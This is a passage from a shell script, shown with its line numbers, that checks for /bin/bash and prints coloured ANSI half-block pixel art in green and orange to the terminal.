\e[38;5;65m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;65m\e[38;5;243m▄\e[0m\e[38;5;233m▀\e[38;5;235m▀\e[0m 288 \e[38;5;242m▀\e[38;5;233m▀\e[38;5;232m▀\e[38;5;234m▀\e[38;5;236m▀\e[48;5;65m\e[38;5;236m▄\e[48;5;65m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;65m\e[38;5;237m▄\e[48;5;237m\e[38;5;8m▄\e[0m\e[38;5;234m▀\e[38;5;232m▀\e[38;5;232m▀\e[38;5;59m▀\e[0m 289 '"; 290 else 291 if [ -f "/bin/bash" ]; then 292 /bin/bash -c "printf ' 293 \e[38;2;26;43;21m▄\e[38;2;58;91;50m▄\e[48;2;116;117;116m\e[38;2;68;119;56m▄\e[48;2;98;98;98m\e[38;2;86;143;70m▄\e[48;2;98;98;98m\e[38;2;100;153;87m▄\e[48;2;63;65;63m\e[38;2;102;164;86m▄\e[48;2;46;49;44m\e[38;2;98;168;79m▄\e[48;2;43;45;43m\e[38;2;91;155;75m▄\e[48;2;61;62;61m\e[38;2;78;137;63m▄\e[48;2;102;101;102m\e[38;2;64;112;52m▄\e[0m\e[38;2;38;67;32m▄\e[38;2;20;35;16m▄\e[38;2;10;20;8m▄\e[38;2;15;21;13m▄\e[0m 294 \e[38;2;49;80;41m▄\e[38;2;73;133;59m▄\e[48;2;20;21;20m\e[38;2;91;163;72m▄\e[48;2;14;27;12m\e[38;2;96;174;76m▄\e[48;2;51;92;41m\e[38;2;98;177;78m▄\e[48;2;86;155;68m\e[38;2;98;177;78m▄\e[48;2;96;173;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;97;175;76m\e[38;2;98;177;78m▄\e[48;2;93;168;74m\e[38;2;98;177;78m▄\e[48;2;99;163;83m\e[38;2;97;177;77m▄\e[48;2;99;151;86m\e[38;2;98;177;78m▄\e[48;2;35;57;29m\e[38;2;98;176;78m▄\e[48;2;19;21;19m\e[38;2;94;169;75m▄\e[0m\e[38;2;70;125;56m▄\e[0m 295 \e[38;2;42;65;36m▄\e[38;2;62;106;52m▄\e[48;2;94;95;94m\e[38;2;86;152;70m▄\e[48;2;57;72;53m\e[38;2;96;174;77m▄\e[48;2;57;96;47m\e[38;2;98;177;78m▄\e[48;2;78;136;62m\e[38;2;98;177;78m▄\e[48;2;95;167;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;77m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m\e[38;2;76;137;60m▄\e[48;2;98;177;78m\e[38;2;54;97;42m▄\e[48;2;99;179;79m\e[38;2;39;71;30m▄\e[48;2;100;181;79m\e[38;2;35;60;30m▄\e[48;2;101;181;81m\e[38;2;42;66;37m▄\e[48;2;100;177;80m\e[38;2;52;73;45m▄\e[48;2;95;175;76m\e[38;2;47;75;40m▄\e[48;2;94;178;73m\e[38;2;41;75;33m▄\e[48;2;98;179;78m\e[38;2;42;73;34m▄\e[48;2;99;180;79m\e[38;2;40;70;33m▄\e[48;2;99;179;78m\e[38;2;44;75;36m▄\e[48;2;97;177;77m\e[38;2;55;93;46m▄\e[48;2;97;176;77m\e[38;2;65;113;52m▄\e[48;2;98;177;78m\e[38;2;79;141;63m▄\e[48;2;98;177;78m\e[38;2;93;166;75m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;94;170;75m\e[38;2;98;177;78m▄\e[48;2;71;128;56m\e[38;2;98;177;78m▄\e[48;2;34;56;28m\e[38;2;97;175;77m▄\e[48;2;64;66;64m\e[38;2;78;140;62m▄\e[0m 296 \e[48;2;66;112;54m\e[38;2;98;177;78m▄\e[48;2;80;133;66m\e[38;2;98;177;78m▄\e[48;2;95;162;76m\e[38;2;98;177;78m▄\e[48;2;96;171;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m\e[38;2;96;174;76m▄\e[48;2;98;177;78m\e[38;2;74;130;59m▄\e[48;2;98;176;78m\e[38;2;32;49;27m▄\e[48;2;95;166;76m\e[38;2;18;29;15m▄\e[48;2;73;126;59m\e[38;2;65;113;53m▄\e[48;2;40;62;34m\e[38;2;107;209;83m▄\e[48;2;23;43;19m\e[38;2;77;220;42m▄\e[48;2;32;72;22m\e[38;2;72;218;36m▄\e[48;2;55;155;30m\e[38;2;73;217;37m▄\e[48;2;71;203;38m\e[38;2;73;217;37m▄\e[48;2;79;212;46m\e[38;2;73;218;37m▄\e[48;2;81;216;48m\e[38;2;73;218;37m▄\e[48;2;82;220;48m\e[38;2;73;218;37m▄\e[48;2;79;221;44m\e[38;2;73;218;37m▄\e[48;2;76;219;40m\e[38;2;73;218;37m▄\e[48;2;76;218;40m\e[38;2;73;218;37m▄\e[48;2;75;213;41m\e[38;2;73;218;37m▄\e[48;2;79;203;48m\e[38;2;73;218;37m▄\e[48;2;76;175;52m\e[38;2;73;218;37m▄\e[48;2;52;127;33m\e[38;2;73;218;37m▄\e[48;2;29;75;18m\e[38;2;73;217;37m▄\e[48;2;19;45;12m\e[38;2;73;218;36m▄\e[48;2;45;74;38m\e[38;2;65;196;33m▄\e[48;2;76;127;62m\e[38;2;44;132;24m▄\e[48;2;90;158;72m\e[38;2;16;45;10m▄\e[48;2;97;175;77m\e[38;2;28;50;22m▄\e[48;2;98;177;78m\e[38;2;80;145;64m▄\e[48;2;98;177;78m\e[38;2;97;175;77m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;97;173;78m\e[38;2;98;177;78m▄\e[48;2;69;114;56m\e[38;2;98;177;78m▄\e[48;2;30;38;28m\e[38;2;103;179;83m▄\e[0m\e[38;2;99;149;87m▄\e[0m 297 \e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;83;150;66m▄\e[48;2;98;177;78m\e[38;2;44;80;34m▄\e[48;2;99;179;78m\e[38;2;33;49;28m▄\e[48;2;87;159;69m\e[38;2;68;97;61m▄\e[48;2;46;84;37m\e[38;2;87;165;68m▄\e[48;2;25;37;21m\e[38;2;83;208;52m▄\e[48;2;59;131;42m\e[38;2;73;219;37m▄\e[48;2;74;199;43m\e[38;2;74;223;37m▄\e[48;2;72;213;38m\e[38;2;67;204;35m▄\e[48;2;73;218;37m\e[38;2;55;171;29m▄\e[48;2;72;218;36m\e[38;2;59;136;22m▄\e[48;2;72;218;36m\e[38;2;103;132;15m▄\e[48;2;73;219;37m\e[38;2;149;133;9m▄\e[48;2;72;220;37m\e[38;2;168;130;7m▄\e[48;2;73;220;37m\e[38;2;167;118;5m▄\e[48;2;72;218;37m\e[38;2;106;78;4m▄\e[48;2;69;210;36m\e[38;2;93;69;4m▄\e[48;2;66;199;34m\e[38;2;173;117;4m▄\e[48;2;63;192;32m\e[38;2;177;119;4m▄\e[48;2;62;186;32m\e[38;2;173;116;4m▄\e[48;2;61;186;31m\e[38;2;176;115;4m▄\e[48;2;63;191;32m\e[38;2;174;115;4m▄\e[48;2;67;202;34m\e[38;2;170;113;4m▄\e[48;2;70;213;36m\e[38;2;180;118;3m▄\e[48;2;72;219;37m\e[38;2;175;117;4m▄\e[48;2;73;220;37m\e[38;2;154;120;7m▄\e[48;2;73;220;37m\e[38;2;80;94;11m▄\e[48;2;73;219;37m\e[38;2;48;93;15m▄\e[48;2;73;218;37m\e[38;2;41;112;19m▄\e[48;2;72;215;36m\e[38;2;45;144;25m▄\e[48;2;64;192;32m\e[38;2;63;191;32m▄\e[48;2;32;99;16m\e[38;2;73;218;37m▄\e[48;2;21;41;16m\e[38;2;72;210;38m▄\e[48;2;38;66;30m\e[38;2;67;177;41m▄\e[48;2;79;141;63m\e[38;2;53;123;36m▄\e[48;2;98;178;78m\e[38;2;32;57;25m▄\e[48;2;98;179;77m\e[38;2;25;46;20m▄\e[48;2;97;177;77m\e[38;2;56;100;46m▄\e[48;2;98;177;78m\e[38;2;93;165;75m▄\e[48;2;97;176;77m\e[38;2;100;181;80m▄\e[48;2;98;177;77m\e[38;2;97;176;76m▄\e[48;2;97;176;78m\e[38;2;98;177;78m▄\e[48;2;99;174;79m\e[38;2;98;177;78m▄\e[0m 298 \e[48;2;98;178;78m\e[38;2;46;76;38m▄\e[48;2;100;178;80m\e[38;2;50;69;45m▄\e[48;2;99;176;80m\e[38;2;35;46;33m▄\e[48;2;82;148;65m\e[38;2;7;9;6m▄\e[48;2;64;117;50m\e[38;2;35;54;30m▄\e[48;2;42;77;34m\e[38;2;52;107;39m▄\e[48;2;26;46;21m\e[38;2;80;194;52m▄\e[48;2;34;71;26m\e[38;2;73;216;38m▄\e[48;2;54;133;35m\e[38;2;67;192;32m▄\e[48;2;81;199;52m\e[38;2;81;158;23m▄\e[48;2;80;218;46m\e[38;2;100;110;11m▄\e[48;2;66;199;33m\e[38;2;152;98;2m▄\e[48;2;60;157;26m\e[38;2;220;129;1m▄\e[48;2;80;128;18m\e[38;2;251;145;0m▄\e[48;2;120;110;9m\e[38;2;255;147;0m▄\e[48;2;154;106;4m\e[38;2;255;147;0m▄\e[48;2;181;114;2m\e[38;2;255;147;0m▄\e[48;2;230;134;0m\e[38;2;255;147;0m▄\e[48;2;251;144;0m\e[38;2;255;147;0m▄\e[48;2;254;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;163;94;0m\e[38;2;134;78;0m▄\e[48;2;2;1;0m\e[38;2;58;33;0m▄\e[48;2;13;7;0m\e[38;2;133;76;0m▄\e[48;2;64;38;0m\e[38;2;12;7;0m▄\e[48;2;250;144;0m\e[38;2;234;135;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;249;146;0m\e[38;2;255;147;0m▄\e[48;2;239;143;2m\e[38;2;255;147;0m▄\e[48;2;223;131;1m\e[38;2;255;147;0m▄\e[48;2;192;120;2m\e[38;2;255;147;0m▄\e[48;2;130;96;5m\e[38;2;255;147;0m▄\e[48;2;82;88;9m\e[38;2;255;148;0m▄\e[48;2;62;104;15m\e[38;2;247;147;1m▄\e[48;2;49;132;22m\e[38;2;212;134;3m▄\e[48;2;57;165;32m\e[38;2;144;95;3m▄\e[48;2;53;117;38m\e[38;2;74;61;8m▄\e[48;2;50;97;39m\e[38;2;47;60;21m▄\e[48;2;35;56;29m\e[38;2;47;81;33m▄\e[48;2;17;22;15m\e[38;2;20;34;19m▄\e[48;2;31;50;26m\e[38;2;48;73;42m▄\e[48;2;55;90;47m\e[38;2;37;56;33m▄\e[48;2;78;132;64m\e[38;2;21;31;18m▄\e[48;2;95;167;78m\e[38;2;18;26;16m▄\e[0m 299 \e[48;2;48;74;43m\e[38;2;51;78;45m▄\e[48;2;48;74;43m\e[38;2;50;76;44m▄\e[48;2;46;71;42m\e[38;2;12;17;11m▄\e[48;2;32;54;28m\e[38;2;45;93;35m▄\e[48;2;58;112;46m\e[38;2;26;45;17m▄\e[48;2;55;130;37m\e[38;2;121;83;5m▄\e[48;2;57;133;27m\e[38;2;232;138;0m▄\e[48;2;101;96;8m\e[38;2;253;146;0m▄\e[48;2;200;118;1m\e[38;2;254;147;0m▄\e[48;2;248;144;0m\e[38;2;255;147;0m▄\e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;173;100;0m\e[38;2;210;122;0m▄\e[48;2;172;100;0m\e[38;2;76;44;0m▄\e[48;2;214;123;0m\e[38;2;153;88;0m▄\e[48;2;36;21;0m\e[38;2;162;94;0m▄\e[48;2;201;116;0m\e[38;2;20;12;0m▄\e[48;2;254;147;0m\e[38;2;238;137;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;241;143;1m\e[38;2;255;147;0m▄\e[48;2;213;125;0m\e[38;2;255;147;0m▄\e[48;2;117;73;3m\e[38;2;252;147;1m▄\e[48;2;25;36;21m\e[38;2;94;69;18m▄\e[48;2;50;77;44m\e[38;2;39;59;33m▄\e[48;2;51;78;45m \e[48;2;51;78;44m\e[38;2;51;78;45m▄\e[0m 300 \e[48;2;51;78;45m\e[38;2;50;76;44m▄\e[48;2;40;58;34m\e[38;2;43;36;13m▄\e[48;2;38;37;6m\e[38;2;240;143;2m▄\e[48;2;149;95;6m\e[38;2;254;147;0m▄\e[48;2;226;134;1m\e[38;2;255;147;0m▄\e[48;2;253;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;243;140;0m▄\e[48;2;116;67;0m\e[38;2;90;52;0m▄\e[48;2;237;137;0m\e[38;2;254;147;0m▄\e[48;2;248;143;0m\e[38;2;255;147;0m▄\e[48;2;250;144;0m\e[38;2;255;147;0m▄\e[48;2;45;25;0m\e[38;2;191;110;0m▄\e[48;2;64;36;0m\e[38;2;32;18;0m▄\e[48;2;245;141;0m\e[38;2;152;87;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;230;140;6m\e[38;2;254;147;0m▄\e[48;2;25;21;7m\e[38;2;143;86;2m▄\e[48;2;48;74;42m\e[38;2;39;60;34m▄\e[48;2;51;78;45m \e[0m 301 \e[48;2;41;63;37m\e[38;2;40;47;23m▄\e[48;2;119;70;1m\e[38;2;230;135;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;180;104;0m\e[38;2;120;68;0m▄\e[48;2;135;78;0m\e[38;2;158;91;0m▄\e[48;2;255;147;0m\e[38;2;250;145;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;146;0m▄\e[48;2;252;145;0m\e[38;2;209;120;0m▄\e[48;2;54;31;0m\e[38;2;61;35;0m▄\e[48;2;94;54;0m\e[38;2;159;91;0m▄\e[48;2;254;146;0m\e[38;2;244;140;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;240;144;1m\e[38;2;255;147;0m▄\e[48;2;36;40;18m\e[38;2;70;49;6m▄\e[48;2;50;78;45m\e[38;2;45;69;40m▄\e[0m 302 \e[48;2;65;48;9m\e[38;2;98;64;6m▄\e[48;2;255;149;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;254;146;0m▄\e[48;2;225;130;0m\e[38;2;175;100;0m▄\e[48;2;210;120;0m\e[38;2;253;146;0m▄\e[48;2;209;121;0m\e[38;2;254;147;0m▄\e[48;2;86;49;0m\e[38;2;189;109;0m▄\e[48;2;254;146;0m\e[38;2;142;81;0m▄\e[48;2;255;147;0m\e[38;2;102;59;0m▄\e[48;2;199;115;0m\e[38;2;69;40;0m▄\e[48;2;244;141;0m\e[38;2;238;138;0m▄\e[48;2;253;146;0m\e[38;2;184;105;0m▄\e[48;2;200;115;0m\e[38;2;231;134;0m▄\e[48;2;253;147;0m\e[38;2;254;146;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;149;98;7m\e[38;2;215;132;5m▄\e[48;2;35;54;32m\e[38;2;31;42;22m▄\e[0m 303 \e[48;2;133;82;3m\e[38;2;153;89;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;248;147;0m▄\e[48;2;254;147;0m\e[38;2;242;142;0m▄\e[48;2;204;116;0m\e[38;2;224;131;0m▄\e[48;2;200;115;0m\e[38;2;205;124;1m▄\e[48;2;199;115;0m\e[38;2;175;109;2m▄\e[48;2;172;100;0m\e[38;2;157;102;2m▄\e[48;2;168;97;0m\e[38;2;172;114;3m▄\e[48;2;206;119;0m\e[38;2;156;115;5m▄\e[48;2;215;125;0m\e[38;2;138;111;7m▄\e[48;2;180;105;0m\e[38;2;121;105;8m▄\e[48;2;233;136;0m\e[38;2;120;109;8m▄\e[48;2;254;148;0m\e[38;2;116;111;9m▄\e[48;2;254;148;0m\e[38;2;112;111;10m▄\e[48;2;255;148;0m\e[38;2;130;121;10m▄\e[48;2;254;148;0m\e[38;2;103;105;10m▄\e[48;2;254;148;0m\e[38;2;99;99;9m▄\e[48;2;254;148;0m\e[38;2;106;98;8m▄\e[48;2;254;148;0m\e[38;2;106;96;8m▄\e[48;2;255;148;0m\e[38;2;118;98;7m▄\e[48;2;255;147;0m\e[38;2;123;101;7m▄\e[48;2;255;147;0m\e[38;2;129;99;6m▄\e[48;2;255;147;0m\e[38;2;141;100;5m▄\e[48;2;255;147;0m\e[38;2;166;111;4m▄\e[48;2;255;147;0m\e[38;2;189;122;4m▄\e[48;2;255;147;0m\e[38;2;217;131;1m▄\e[48;2;255;147;0m\e[38;2;248;145;0m▄\e[48;2;255;147;0m\e[38;2;250;148;0m▄\e[48;2;255;147;0m\e[38;2;254;149;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;249;147;1m\e[38;2;254;147;0m▄\e[48;2;47;44;15m\e[38;2;81;54;7m▄\e[0m 304 \e[48;2;163;95;0m\e[38;2;176;103;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;147;0m▄\e[48;2;255;147;0m\e[38;2;250;144;0m▄\e[48;2;255;147;0m\e[38;2;238;146;1m▄\e[48;2;254;147;0m\e[38;2;170;117;4m▄\e[48;2;252;147;0m\e[38;2;78;65;5m▄\e[48;2;239;144;1m\e[38;2;36;71;11m▄\e[48;2;220;136;2m\e[38;2;41;122;21m▄\e[48;2;193;124;2m\e[38;2;59;179;31m▄\e[48;2;178;119;4m\e[38;2;69;210;35m▄\e[48;2;129;104;6m\e[38;2;73;219;37m▄\e[48;2;67;87;10m\e[38;2;73;219;37m▄\e[48;2;61;106;15m\e[38;2;73;218;37m▄\e[48;2;52;126;21m\e[38;2;73;218;37m▄\e[48;2;52;150;25m\e[38;2;73;218;37m▄\e[48;2;58;177;30m\e[38;2;73;218;37m▄\e[48;2;63;194;33m\e[38;2;73;218;37m▄\e[48;2;66;204;34m\e[38;2;73;218;37m▄\e[48;2;69;212;36m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;72;219;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;219;37m\e[38;2;73;218;37m▄\e[48;2;72;214;36m\e[38;2;73;218;37m▄\e[48;2;68;207;35m\e[38;2;73;218;37m▄\e[48;2;65;197;34m\e[38;2;73;218;37m▄\e[48;2;61;185;32m\e[38;2;73;218;37m▄\e[48;2;51;157;27m\e[38;2;73;218;37m▄\e[48;2;41;125;21m\e[38;2;73;218;37m▄\e[48;2;40;106;18m\e[38;2;73;218;37m▄\e[48;2;75;92;10m\e[38;2;73;218;37m▄\e[48;2;76;85;10m\e[38;2;73;219;37m▄\e[48;2;112;94;7m\e[38;2;72;216;36m▄\e[48;2;162;113;5m\e[38;2;64;194;33m▄\e[48;2;219;131;0m\e[38;2;50;152;26m▄\e[48;2;231;138;1m\e[38;2;30;65;14m▄\e[48;2;252;147;0m\e[38;2;106;71;5m▄\e[48;2;97;61;4m\e[38;2;30;31;7m▄\e[0m 305 \e[48;2;186;108;0m\e[38;2;185;108;0m▄\e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;247;144;0m▄\e[48;2;255;147;0m\e[38;2;188;113;1m▄\e[48;2;255;147;0m\e[38;2;110;100;8m▄\e[48;2;248;147;0m\e[38;2;72;136;20m▄\e[48;2;206;124;1m\e[38;2;62;175;29m▄\e[48;2;115;81;4m\e[38;2;67;204;34m▄\e[48;2;55;92;13m\e[38;2;72;217;36m▄\e[48;2;60;157;26m\e[38;2;73;218;37m▄\e[48;2;66;195;32m\e[38;2;73;218;37m▄\e[48;2;70;212;35m\e[38;2;73;218;37m▄\e[48;2;72;215;36m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;210;37m\e[38;2;71;214;37m▄\e[48;2;58;142;37m\e[38;2;57;136;37m▄\e[48;2;51;109;39m\e[38;2;54;109;40m▄\e[48;2;36;76;26m\e[38;2;38;71;31m▄\e[0m 306 \e[48;2;73;63;12m\e[38;2;24;46;20m▄\e[48;2;89;67;7m\e[38;2;54;120;38m▄\e[48;2;67;119;19m\e[38;2;66;192;35m▄\e[48;2;61;177;29m\e[38;2;73;217;37m▄\e[48;2;71;213;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;214;35m\e[38;2;42;129;21m▄\e[48;2;43;131;22m\e[38;2;4;10;2m▄\e[48;2;37;111;19m\e[38;2;4;10;2m▄\e[48;2;60;180;30m\e[38;2;7;22;3m▄\e[48;2;73;218;37m\e[38;2;62;187;31m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;69;208;35m\e[38;2;20;61;10m▄\e[48;2;43;129;22m\e[38;2;4;11;2m▄\e[48;2;38;116;19m\e[38;2;3;8;1m▄\e[48;2;64;192;32m\e[38;2;19;57;10m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;214;36m\e[38;2;71;213;36m▄\e[48;2;55;130;37m\e[38;2;55;123;38m▄\e[48;2;54;108;41m\e[38;2;56;110;44m▄\e[48;2;35;60;30m\e[38;2;35;57;30m▄\e[0m 307 \e[48;2;37;68;29m\e[38;2;38;61;33m▄\e[48;2;58;132;39m\e[38;2;62;134;45m▄\e[48;2;64;179;36m\e[38;2;55;129;37m▄\e[48;2;72;217;36m\e[38;2;71;210;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;27;82;14m\e[38;2;59;178;30m▄\e[48;2;4;11;3m\e[38;2;3;9;1m▄\e[48;2;0;0;0m\e[38;2;8;18;4m▄\e[48;2;1;3;1m\e[38;2;4;12;2m▄\e[48;2;36;112;19m\e[38;2;54;163;27m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;70;210;36m\e[38;2;72;217;36m▄\e[48;2;4;11;1m\e[38;2;9;28;4m▄\e[48;2;0;0;0m\e[38;2;6;16;3m▄\e[48;2;1;3;1m\e[38;2;6;15;3m▄\e[48;2;13;39;6m\e[38;2;32;94;15m▄\e[48;2;73;218;37m 